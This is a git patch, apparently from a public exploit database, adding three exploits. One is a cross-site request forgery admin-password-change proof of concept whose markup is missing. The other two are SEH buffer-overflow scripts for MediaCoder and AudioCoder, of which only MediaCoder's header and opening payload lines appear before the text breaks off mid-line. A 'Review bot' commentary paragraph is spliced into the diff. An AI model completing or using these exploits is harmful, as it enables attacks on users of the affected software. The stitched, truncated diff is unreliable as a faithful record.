From 82b7d150c6f7a6ee62674b8a5d18eaa47c7718fa Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 28 Jul 2017 05:01:21 +0000
Subject: [PATCH] DB: 2017-07-28 3 new exploits MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) AudioCoder 0.8.46 - Local Buffer Overflow (SEH) Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)
---
 files.csv | 3 ++
 platforms/php/webapps/42383.html | 17 ++++++++++
 platforms/windows/local/42384.py | 54 ++++++++++++++++++++++++++++++++
 platforms/windows/local/42385.py | 52 ++++++++++++++++++++++++++++++
 4 files changed, 126 insertions(+)
 create mode 100755 platforms/php/webapps/42383.html
 create mode 100755 platforms/windows/local/42384.py
 create mode 100755 platforms/windows/local/42385.py
diff --git a/files.csv b/files.csv
index 582ab7d54..f376482aa 100644
--- a/files.csv
+++ b/files.csv
@@ -9153,6 +9153,8 @@ id,file,description,date,author,platform,type,port
 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
 42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
+42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
+42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38182,4 +38184,5 @@ id,file,description,date,author,platform,type,port
 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
+42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42383.html b/platforms/php/webapps/42383.html
new file mode 100755
index 000000000..56173d837
--- /dev/null
+++ b/platforms/php/webapps/42383.html
@@ -0,0 +1,17 @@
+Friends in War Make or Break 1.7 - Unauthenticated admin password change
+
+Url: http://software.friendsinwar.com/
+ http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
+
+Author: shinnai
+mail: shinnai[at]autistici[dot]org
+site: http://www.shinnai.altervista.org/
+---------------------------------------------------------------------
+
+PROOF OF CONCEPT:
+
+
+
+
+
+
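Review bot: The title line of 42383.html calls this an "Unauthenticated admin password change", while the files.csv row added for the same id in this commit labels it "Cross-Site Request Forgery (Change Admin Password)"; these are different root causes, and a maintainer reading only one of them will reach a different conclusion about the fix. If the request depends on a logged-in administrator's browser, the remedy is a per-session anti-CSRF token and re-entry of the current password on the password-change form; if it succeeds with no session at all, the handler is missing an authentication check. I would add a header line under `Author:` that states which applies, e.g. `Class: CSRF (admin session required)` or `Class: missing authentication check`, and a `Fix:` line naming the remediation or noting that no patched release exists. The markup after `PROOF OF CONCEPT:` did not survive on this page, so the visible lines do not settle which classification is correct.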
diff --git a/platforms/windows/local/42384.py b/platforms/windows/local/42384.py
new file mode 100755
index 000000000..c12c09a5e
--- /dev/null
+++ b/platforms/windows/local/42384.py
@@ -0,0 +1,54 @@
+#!/usr/bin/python
+# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
+# CVE : CVE-2017-8869
+# Exploit Author : Muhann4d @0xSecured
+# Vendor Homepage : http://www.mediacoderhq.com
+# Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
+# Vulnerable Version : 0.8.48.5888
+# Fixed version : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe
+# Category : Local Buffer Overflow
+# Tested on OS : Windows 7 Pro SP1 32bit
+# How to : Open MediaCoder then drag & drop the .m3u file in it and then press the START button.
+# or just write click on the .mu3 file .. open with .. MediaCoder
+# Timeline :
+# 2017-05-05: Vulnerability discovered, vendor has been contaced
+# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version"
+# 2017-05-09: A POC sent to the vendor.
+# 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/
+# 2017-06-26: Exploit released.
+
+print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured"
+from struct import pack
+
+junk = "http://" + "\x41" * 361
+nseh = pack('